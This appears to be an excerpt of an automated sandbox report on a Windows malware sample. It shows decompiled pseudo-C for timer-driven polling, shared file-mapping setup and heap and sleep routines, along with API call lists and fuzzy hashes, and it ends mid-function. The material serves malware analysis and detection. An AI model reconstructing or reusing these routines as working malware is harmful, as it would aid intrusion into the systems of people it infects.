                                                                                                                                                                                                                                • RtlLeaveCriticalSection.NTDLL(01AE9570), ref: 00A8A701
                                                                                                                                                                                                                                  • Part of subcall function 00A822AB: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,770CC740,?,?,00A8A714,?,01AE95B0), ref: 00A822D6
                                                                                                                                                                                                                                  • Part of subcall function 00A822AB: lstrlen.KERNEL32(?,?,?,00A8A714,?,01AE95B0), ref: 00A822DE
                                                                                                                                                                                                                                  • Part of subcall function 00A822AB: strcpy.NTDLL ref: 00A822F5
                                                                                                                                                                                                                                  • Part of subcall function 00A822AB: lstrcat.KERNEL32(00000000,?), ref: 00A82300
                                                                                                                                                                                                                                  • Part of subcall function 00A822AB: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00A8A714,?,01AE95B0), ref: 00A8231D
                                                                                                                                                                                                                                • StrTrimA.SHLWAPI(00000000,00A8C2AC,?,01AE95B0), ref: 00A8A733
                                                                                                                                                                                                                                  • Part of subcall function 00A82629: lstrlen.KERNEL32(01AE9B98,00000000,00000000,770CC740,00A8A73F,00000000), ref: 00A82639
                                                                                                                                                                                                                                  • Part of subcall function 00A82629: lstrlen.KERNEL32(?), ref: 00A82641
                                                                                                                                                                                                                                  • Part of subcall function 00A82629: lstrcpy.KERNEL32(00000000,01AE9B98), ref: 00A82655
                                                                                                                                                                                                                                  • Part of subcall function 00A82629: lstrcat.KERNEL32(00000000,?), ref: 00A82660
                                                                                                                                                                                                                                • lstrcpy.KERNEL32(00000000,?), ref: 00A8A752
                                                                                                                                                                                                                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00A8A759
                                                                                                                                                                                                                                • lstrcat.KERNEL32(00000000,?), ref: 00A8A766
                                                                                                                                                                                                                                • lstrcat.KERNEL32(00000000,00000000), ref: 00A8A76A
                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000,?,00000000,?,?), ref: 00A8A79A
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00A8A7A9
                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000,00000000,?,01AE95B0), ref: 00A8A7B8
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000), ref: 00A8A7CA
                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000,?), ref: 00A8A7D9
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                 • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
                                                                                                                                                                                                                                 • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                 • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                 • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeavestrcpy
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 3963266935-1536154274
                                                                                                                                                                                                                                • Opcode ID: 995d231aca8ec13d0a428ae2169b716c5f53c587e75d7fc75c347b18483e9c9c
                                                                                                                                                                                                                                • Instruction ID: 508a3fe40aaa7d6dfc1c25ad121bad46dd99a0d1d674875aff0d469f185b64e3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 995d231aca8ec13d0a428ae2169b716c5f53c587e75d7fc75c347b18483e9c9c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F8617B71500201EFD721EBE4ED48FAA3BB8FB48360F040525F949D72A1EB35E9179B66
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 83%
                                                                                                                                                                                                                                			E00A89FF2(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                				struct %anon52 _v8;
                                                                                                                                                                                                                                				long _v12;
                                                                                                                                                                                                                                				char _v16;
                                                                                                                                                                                                                                				char _v20;
                                                                                                                                                                                                                                				signed int _v24;
                                                                                                                                                                                                                                				intOrPtr _v32;
                                                                                                                                                                                                                                				union _LARGE_INTEGER _v36;
                                                                                                                                                                                                                                				intOrPtr _v40;
                                                                                                                                                                                                                                				void* _v44;
                                                                                                                                                                                                                                				void _v88;
                                                                                                                                                                                                                                				char _v92;
                                                                                                                                                                                                                                				struct %anon52 _t46;
                                                                                                                                                                                                                                				intOrPtr _t51;
                                                                                                                                                                                                                                				long _t53;
                                                                                                                                                                                                                                				void* _t54;
                                                                                                                                                                                                                                				struct %anon52 _t60;
                                                                                                                                                                                                                                				long _t64;
                                                                                                                                                                                                                                				signed int _t65;
                                                                                                                                                                                                                                				void* _t68;
                                                                                                                                                                                                                                				void* _t70;
                                                                                                                                                                                                                                				signed int _t71;
                                                                                                                                                                                                                                				intOrPtr _t73;
                                                                                                                                                                                                                                				intOrPtr _t76;
                                                                                                                                                                                                                                				void** _t78;
                                                                                                                                                                                                                                				void* _t80;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t73 = __edx;
                                                                                                                                                                                                                                				_v92 = 0;
                                                                                                                                                                                                                                				memset( &_v88, 0, 0x2c);
                                                                                                                                                                                                                                				_t46 = CreateWaitableTimerA(0, 1, 0);
                                                                                                                                                                                                                                				_v44 = _t46;
                                                                                                                                                                                                                                				if(_t46 == 0) {
                                                                                                                                                                                                                                					_v8.LowPart = GetLastError();
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					_push(0xffffffff);
                                                                                                                                                                                                                                					_push(0xff676980);
                                                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                                                					_push( *0xa8d278);
                                                                                                                                                                                                                                					_v20 = 0;
                                                                                                                                                                                                                                					_v16 = 0;
                                                                                                                                                                                                                                					L00A8AEC0();
                                                                                                                                                                                                                                					_v36.LowPart = _t46;
                                                                                                                                                                                                                                					_v32 = _t73;
                                                                                                                                                                                                                                					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                                                                                                                                                                                                                                					_t51 =  *0xa8d2a4; // 0x218
                                                                                                                                                                                                                                					_v40 = _t51;
                                                                                                                                                                                                                                					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                                                                                                                                                                                                					_v8.LowPart = _t53;
                                                                                                                                                                                                                                					if(_t53 == 0) {
                                                                                                                                                                                                                                						if(_a8 != 0) {
                                                                                                                                                                                                                                							L4:
                                                                                                                                                                                                                                							 *0xa8d284 = 5;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_t68 = E00A82932(_t73); // executed
                                                                                                                                                                                                                                							if(_t68 != 0) {
                                                                                                                                                                                                                                								goto L4;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_v12 = 0;
                                                                                                                                                                                                                                						L6:
                                                                                                                                                                                                                                						if(_v12 == 1 && ( *0xa8d298 & 0x00000001) == 0) {
                                                                                                                                                                                                                                							_v12 = 2;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t71 = _v12;
                                                                                                                                                                                                                                						_t58 = _t71 << 4;
                                                                                                                                                                                                                                						_t76 = _t80 + (_t71 << 4) - 0x54;
                                                                                                                                                                                                                                						_t72 = _t71 + 1;
                                                                                                                                                                                                                                						_v24 = _t71 + 1;
                                                                                                                                                                                                                                						_t60 = E00A8462F(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16);
                                                                                                                                                                                                                                						_v8.LowPart = _t60;
                                                                                                                                                                                                                                						if(_t60 != 0) {
                                                                                                                                                                                                                                							goto L17;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t65 = _v24;
                                                                                                                                                                                                                                						_v12 = _t65;
                                                                                                                                                                                                                                						_t90 = _t65 - 3;
                                                                                                                                                                                                                                						if(_t65 != 3) {
                                                                                                                                                                                                                                							goto L6;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_v8.LowPart = E00A8516C(_t72, _t90,  &_v92, _a4, _a8);
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						goto L12;
                                                                                                                                                                                                                                						L17:
                                                                                                                                                                                                                                						__eflags = _t60 - 0x10d2;
                                                                                                                                                                                                                                						if(_t60 != 0x10d2) {
                                                                                                                                                                                                                                							_push(0xffffffff);
                                                                                                                                                                                                                                							_push(0xff676980);
                                                                                                                                                                                                                                							_push(0);
                                                                                                                                                                                                                                							_push( *0xa8d27c);
                                                                                                                                                                                                                                							goto L21;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							__eflags =  *0xa8d280; // 0x0
                                                                                                                                                                                                                                							if(__eflags == 0) {
                                                                                                                                                                                                                                								goto L12;
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								_t60 = E00A8651D();
                                                                                                                                                                                                                                								_push(0xffffffff);
                                                                                                                                                                                                                                								_push(0xdc3cba00);
                                                                                                                                                                                                                                								_push(0);
                                                                                                                                                                                                                                								_push( *0xa8d280);
                                                                                                                                                                                                                                								L21:
                                                                                                                                                                                                                                								L00A8AEC0();
                                                                                                                                                                                                                                								_v36.LowPart = _t60;
                                                                                                                                                                                                                                								_v32 = _t76;
                                                                                                                                                                                                                                								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
                                                                                                                                                                                                                                								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                                                                                                                                                                                                								_v8.LowPart = _t64;
                                                                                                                                                                                                                                								__eflags = _t64;
                                                                                                                                                                                                                                								if(_t64 == 0) {
                                                                                                                                                                                                                                									goto L6;
                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                									goto L12;
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						L25:
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					L12:
                                                                                                                                                                                                                                					_t78 =  &_v92;
                                                                                                                                                                                                                                					_t70 = 3;
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						_t54 =  *_t78;
                                                                                                                                                                                                                                						if(_t54 != 0) {
                                                                                                                                                                                                                                							HeapFree( *0xa8d270, 0, _t54);
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t78 =  &(_t78[4]);
                                                                                                                                                                                                                                						_t70 = _t70 - 1;
                                                                                                                                                                                                                                					} while (_t70 != 0);
                                                                                                                                                                                                                                					CloseHandle(_v44);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _v8;
                                                                                                                                                                                                                                				goto L25;
                                                                                                                                                                                                                                			}





























                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • memset.NTDLL ref: 00A8A007
                                                                                                                                                                                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 00A8A013
                                                                                                                                                                                                                                • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 00A8A038
                                                                                                                                                                                                                                • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 00A8A054
                                                                                                                                                                                                                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00A8A06D
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000), ref: 00A8A103
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00A8A112
                                                                                                                                                                                                                                • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 00A8A14C
                                                                                                                                                                                                                                • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,00A858BD,?), ref: 00A8A162
                                                                                                                                                                                                                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00A8A16D
                                                                                                                                                                                                                                  • Part of subcall function 00A82932: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,01AE9370,00000000,?,747DF710,00000000,747DF730), ref: 00A82981
                                                                                                                                                                                                                                  • Part of subcall function 00A82932: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,01AE93A8,?,00000000,30314549,00000014,004F0053,01AE9364), ref: 00A82A1E
                                                                                                                                                                                                                                  • Part of subcall function 00A82932: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00A8A080), ref: 00A82A30
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A8A17F
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                                                                                                                                                                                                • String ID: Uxt$@MxtNxt
                                                                                                                                                                                                                                • API String ID: 3521023985-2342693527
                                                                                                                                                                                                                                • Opcode ID: 122823cbc07cc5c57cc4b213a0ac6b5639709a970953654763ceff6936983acf
                                                                                                                                                                                                                                • Instruction ID: 7f170221c1716a5187db04f30e5981ebbf3d153f279cf59b7459ef7ca88a09b1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 122823cbc07cc5c57cc4b213a0ac6b5639709a970953654763ceff6936983acf
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D6515C71801228EBEF11EFE4DD44DEEBFB8EF19360F204616F414A6290D7709A41DBA1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 74%
                                                                                                                                                                                                                                			E00A81DF5(intOrPtr __edx, void** _a4, void** _a8) {
                                                                                                                                                                                                                                				intOrPtr _v8;
                                                                                                                                                                                                                                				struct _FILETIME* _v12;
                                                                                                                                                                                                                                				short _v56;
                                                                                                                                                                                                                                				struct _FILETIME* _t12;
                                                                                                                                                                                                                                				intOrPtr _t13;
                                                                                                                                                                                                                                				void* _t17;
                                                                                                                                                                                                                                				void* _t21;
                                                                                                                                                                                                                                				intOrPtr _t27;
                                                                                                                                                                                                                                				long _t28;
                                                                                                                                                                                                                                				void* _t30;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t27 = __edx;
                                                                                                                                                                                                                                				_t12 =  &_v12;
                                                                                                                                                                                                                                				GetSystemTimeAsFileTime(_t12);
                                                                                                                                                                                                                                				_push(0x192);
                                                                                                                                                                                                                                				_push(0x54d38000);
                                                                                                                                                                                                                                				_push(_v8);
                                                                                                                                                                                                                                				_push(_v12);
                                                                                                                                                                                                                                				L00A8AEBA();
                                                                                                                                                                                                                                				_push(_t12);
                                                                                                                                                                                                                                				_v12 = _t12;
                                                                                                                                                                                                                                				_t13 =  *0xa8d2e0; // 0x105a5a8
                                                                                                                                                                                                                                				_t5 = _t13 + 0xa8e876; // 0x1ae8e1e
                                                                                                                                                                                                                                				_t6 = _t13 + 0xa8e59c; // 0x530025
                                                                                                                                                                                                                                				_push(0x16);
                                                                                                                                                                                                                                				_push( &_v56);
                                                                                                                                                                                                                                				_v8 = _t27;
                                                                                                                                                                                                                                				L00A8ABDA();
                                                                                                                                                                                                                                				_t17 = CreateFileMappingW(0xffffffff, 0xa8d2e4, 4, 0, 0x1000,  &_v56); // executed
                                                                                                                                                                                                                                				_t30 = _t17;
                                                                                                                                                                                                                                				if(_t30 == 0) {
                                                                                                                                                                                                                                					_t28 = GetLastError();
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					if(GetLastError() == 0xb7) {
                                                                                                                                                                                                                                						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                                                                                                                                                                                                                                						if(_t21 == 0) {
                                                                                                                                                                                                                                							_t28 = GetLastError();
                                                                                                                                                                                                                                							if(_t28 != 0) {
                                                                                                                                                                                                                                								goto L6;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							 *_a4 = _t30;
                                                                                                                                                                                                                                							 *_a8 = _t21;
                                                                                                                                                                                                                                							_t28 = 0;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_t28 = 2;
                                                                                                                                                                                                                                						L6:
                                                                                                                                                                                                                                						CloseHandle(_t30);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t28;
                                                                                                                                                                                                                                			}














                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,00A85790,?,?,4D283A53,?,?), ref: 00A81E01
                                                                                                                                                                                                                                • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00A81E17
                                                                                                                                                                                                                                • _snwprintf.NTDLL ref: 00A81E3C
                                                                                                                                                                                                                                • CreateFileMappingW.KERNELBASE(000000FF,00A8D2E4,00000004,00000000,00001000,?), ref: 00A81E58
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00A85790,?,?,4D283A53), ref: 00A81E6A
                                                                                                                                                                                                                                • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00A81E81
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00A85790,?,?), ref: 00A81EA2
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00A85790,?,?,4D283A53), ref: 00A81EAA
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
• Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
• Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
• Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                                                                                                                                • String ID: @MxtNxt
                                                                                                                                                                                                                                • API String ID: 1814172918-1701360479
                                                                                                                                                                                                                                • Opcode ID: 3be096e93b63897431fdb6e1f449f8dfcc6429aff4357ec11ceba1d9e384c520
                                                                                                                                                                                                                                • Instruction ID: 1c48505950a209ce47bae4c8336f01801965f5c1ae8afecb461b3ffcb7b6ae9a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3be096e93b63897431fdb6e1f449f8dfcc6429aff4357ec11ceba1d9e384c520
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0B21A272A40214FBD721FBA4DC45FAE37BDAF94760F244125FA05E71D0E77099069B60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 74%
                                                                                                                                                                                                                                			E00A84D07(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                				struct _FILETIME _v12;
                                                                                                                                                                                                                                				void* _t10;
                                                                                                                                                                                                                                				void* _t12;
                                                                                                                                                                                                                                				int _t14;
                                                                                                                                                                                                                                				signed int _t16;
                                                                                                                                                                                                                                				void* _t18;
                                                                                                                                                                                                                                				signed int _t19;
                                                                                                                                                                                                                                				unsigned int _t23;
                                                                                                                                                                                                                                				void* _t27;
                                                                                                                                                                                                                                				signed int _t34;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t27 = __edx;
                                                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                                                				_t10 = HeapCreate(0, 0x400000, 0); // executed
                                                                                                                                                                                                                                				 *0xa8d270 = _t10;
                                                                                                                                                                                                                                				if(_t10 != 0) {
                                                                                                                                                                                                                                					 *0xa8d160 = GetTickCount();
                                                                                                                                                                                                                                					_t12 = E00A86246(_a4);
                                                                                                                                                                                                                                					if(_t12 == 0) {
                                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                                							GetSystemTimeAsFileTime( &_v12);
                                                                                                                                                                                                                                							_t14 = SwitchToThread();
                                                                                                                                                                                                                                							_t23 = _v12.dwHighDateTime;
                                                                                                                                                                                                                                							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 5;
                                                                                                                                                                                                                                							_push(0);
                                                                                                                                                                                                                                							_push(0x13);
                                                                                                                                                                                                                                							_push(_t23 >> 5);
                                                                                                                                                                                                                                							_push(_t16);
                                                                                                                                                                                                                                							L00A8B01E();
                                                                                                                                                                                                                                							_t34 = _t14 + _t16;
                                                                                                                                                                                                                                							_t18 = E00A8120C(_a4, _t34);
                                                                                                                                                                                                                                							_t19 = 3;
                                                                                                                                                                                                                                							_t26 = _t34 & 0x00000007;
                                                                                                                                                                                                                                							Sleep(_t19 << (_t34 & 0x00000007)); // executed
                                                                                                                                                                                                                                						} while (_t18 == 1);
                                                                                                                                                                                                                                						if(E00A875DD(_t26) != 0) {
                                                                                                                                                                                                                                							 *0xa8d298 = 1; // executed
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t12 = E00A85701(_t27); // executed
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					_t12 = 8;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t12;
                                                                                                                                                                                                                                			}














                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,00A85992,?), ref: 00A84D1A
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00A84D2E
                                                                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,00A85992,?), ref: 00A84D4A
                                                                                                                                                                                                                                • SwitchToThread.KERNEL32(?,00000001,?,?,?,00A85992,?), ref: 00A84D50
                                                                                                                                                                                                                                • _aullrem.NTDLL(?,?,00000013,00000000), ref: 00A84D6D
                                                                                                                                                                                                                                • Sleep.KERNELBASE(00000003,00000000,?,00000001,?,?,?,00A85992,?), ref: 00A84D8A
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
• Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
• Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
• Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                                                                                                                                                                                                                                • String ID: "f
                                                                                                                                                                                                                                • API String ID: 507476733-3364321186
                                                                                                                                                                                                                                • Opcode ID: 4dab9c76fe64342bde5bb3c251fde30eee2bb7b400453a932ed11fa47c67ac9e
                                                                                                                                                                                                                                • Instruction ID: 90fbdb0d37a39949a597938c0ce08e902a46e602f40f5fc011f779ebee539c5f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4dab9c76fe64342bde5bb3c251fde30eee2bb7b400453a932ed11fa47c67ac9e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 93118672A50305ABD710FBB4EC1AF9A77A8AB483A1F104525FA15D61D0FB74D4018B61
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 87%
                                                                                                                                                                                                                                			E736D700B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                				intOrPtr _t34;
                                                                                                                                                                                                                                				signed int _t40;
                                                                                                                                                                                                                                				signed int _t41;
                                                                                                                                                                                                                                				signed int _t45;
                                                                                                                                                                                                                                				signed char _t54;
                                                                                                                                                                                                                                				signed int _t56;
                                                                                                                                                                                                                                				signed int _t58;
                                                                                                                                                                                                                                				void* _t61;
                                                                                                                                                                                                                                				void* _t68;
                                                                                                                                                                                                                                				signed int _t72;
                                                                                                                                                                                                                                				signed int _t76;
                                                                                                                                                                                                                                				signed int _t80;
                                                                                                                                                                                                                                				void* _t82;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t68 = __edx;
                                                                                                                                                                                                                                				_push(0x10);
                                                                                                                                                                                                                                				_push(0x736e9a08);
                                                                                                                                                                                                                                				E736D7870(__ebx, __edi, __esi);
                                                                                                                                                                                                                                				_t34 =  *0x736ef120; // 0x1
                                                                                                                                                                                                                                				if(_t34 > 0) {
                                                                                                                                                                                                                                					 *0x736ef120 = _t34 - 1;
                                                                                                                                                                                                                                					 *(_t82 - 0x1c) = 1;
                                                                                                                                                                                                                                					 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
                                                                                                                                                                                                                                					 *((char*)(_t82 - 0x20)) = E736D7453();
                                                                                                                                                                                                                                					 *(_t82 - 4) = 1;
                                                                                                                                                                                                                                					__eflags =  *0x736ef460 - 2;
                                                                                                                                                                                                                                					if( *0x736ef460 != 2) {
                                                                                                                                                                                                                                						E736D76ED(_t68, 1, __esi, 7);
                                                                                                                                                                                                                                						asm("int3");
                                                                                                                                                                                                                                						_push(0xc);
                                                                                                                                                                                                                                						_push(0x736e9a30);
                                                                                                                                                                                                                                						E736D7870(__ebx, 1, __esi);
                                                                                                                                                                                                                                						_t72 =  *(_t82 + 0xc);
                                                                                                                                                                                                                                						__eflags = _t72;
                                                                                                                                                                                                                                						if(_t72 != 0) {
                                                                                                                                                                                                                                							L9:
                                                                                                                                                                                                                                							 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
                                                                                                                                                                                                                                							__eflags = _t72 - 1;
                                                                                                                                                                                                                                							if(_t72 == 1) {
                                                                                                                                                                                                                                								L12:
                                                                                                                                                                                                                                								_t58 =  *(_t82 + 0x10);
                                                                                                                                                                                                                                								_t76 = E736D71C6( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
                                                                                                                                                                                                                                								 *(_t82 - 0x1c) = _t76;
                                                                                                                                                                                                                                								__eflags = _t76;
                                                                                                                                                                                                                                								if(_t76 != 0) {
                                                                                                                                                                                                                                									_t41 = E736D6EB1(_t58, _t61, _t68, _t72, _t76,  *((intOrPtr*)(_t82 + 8)), _t72, _t58); // executed
                                                                                                                                                                                                                                									_t76 = _t41;
                                                                                                                                                                                                                                									 *(_t82 - 0x1c) = _t76;
                                                                                                                                                                                                                                									__eflags = _t76;
                                                                                                                                                                                                                                									if(_t76 != 0) {
                                                                                                                                                                                                                                										goto L14;
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								__eflags = _t72 - 2;
                                                                                                                                                                                                                                								if(_t72 == 2) {
                                                                                                                                                                                                                                									goto L12;
                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                									_t58 =  *(_t82 + 0x10);
                                                                                                                                                                                                                                									L14:
                                                                                                                                                                                                                                									_push(_t58);
                                                                                                                                                                                                                                									_t76 = E736D6490( *((intOrPtr*)(_t82 + 8)), _t72);
                                                                                                                                                                                                                                									 *(_t82 - 0x1c) = _t76;
                                                                                                                                                                                                                                									__eflags = _t72 - 1;
                                                                                                                                                                                                                                									if(_t72 == 1) {
                                                                                                                                                                                                                                										__eflags = _t76;
                                                                                                                                                                                                                                										if(_t76 == 0) {
                                                                                                                                                                                                                                											_push(_t58);
                                                                                                                                                                                                                                											_t45 = E736D6490( *((intOrPtr*)(_t82 + 8)), _t42);
                                                                                                                                                                                                                                											__eflags = _t58;
                                                                                                                                                                                                                                											_t25 = _t58 != 0;
                                                                                                                                                                                                                                											__eflags = _t25;
                                                                                                                                                                                                                                											_push((_t45 & 0xffffff00 | _t25) & 0x000000ff);
                                                                                                                                                                                                                                											E736D700B(_t58, _t68, _t72, _t76, _t25);
                                                                                                                                                                                                                                											_pop(_t61);
                                                                                                                                                                                                                                											E736D71C6( *((intOrPtr*)(_t82 + 8)), _t76, _t58);
                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                									__eflags = _t72;
                                                                                                                                                                                                                                									if(_t72 == 0) {
                                                                                                                                                                                                                                										L19:
                                                                                                                                                                                                                                										_t76 = E736D6EB1(_t58, _t61, _t68, _t72, _t76,  *((intOrPtr*)(_t82 + 8)), _t72, _t58);
                                                                                                                                                                                                                                										 *(_t82 - 0x1c) = _t76;
                                                                                                                                                                                                                                										__eflags = _t76;
                                                                                                                                                                                                                                										if(_t76 != 0) {
